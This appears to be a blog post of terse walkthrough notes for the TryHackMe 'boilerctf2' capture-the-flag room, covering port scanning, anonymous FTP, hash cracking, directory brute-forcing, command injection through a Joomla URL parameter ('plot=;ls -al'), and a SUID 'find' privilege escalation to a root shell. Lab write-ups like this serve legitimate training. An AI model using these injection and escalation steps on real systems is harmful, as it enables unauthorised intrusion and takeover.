https://tryhackme.com/room/boilerctf2
Nmap -Pn -A -v IP
Nmap -SC -sV IP -oN nmap
Nmap -p- IP
ftp anon
ports 22,80,10000, *55007*
cat
robots.txt
ASCII to TEXT converter
Cyberchef
hashcat -a 0 -m 0 for MD5
echo | base64 -d | base64 -d
dirsearch -u http:///ext -e -f -x 400,403
searchsploit
joomla/index.php?plot=;ls -al
joomla/index.php?plot=;cat log.txt
Get Basterd Password
ssh with *55007*
find hidden files with ls -al
Get Stoner Password
su Stoner at port *55007*
Get Priveledges via "find" with find . -exec /bin/sh -p \; -quit
whoami > root
cd ../..
cd root
read root flag...
thank you...
Comments
Post a Comment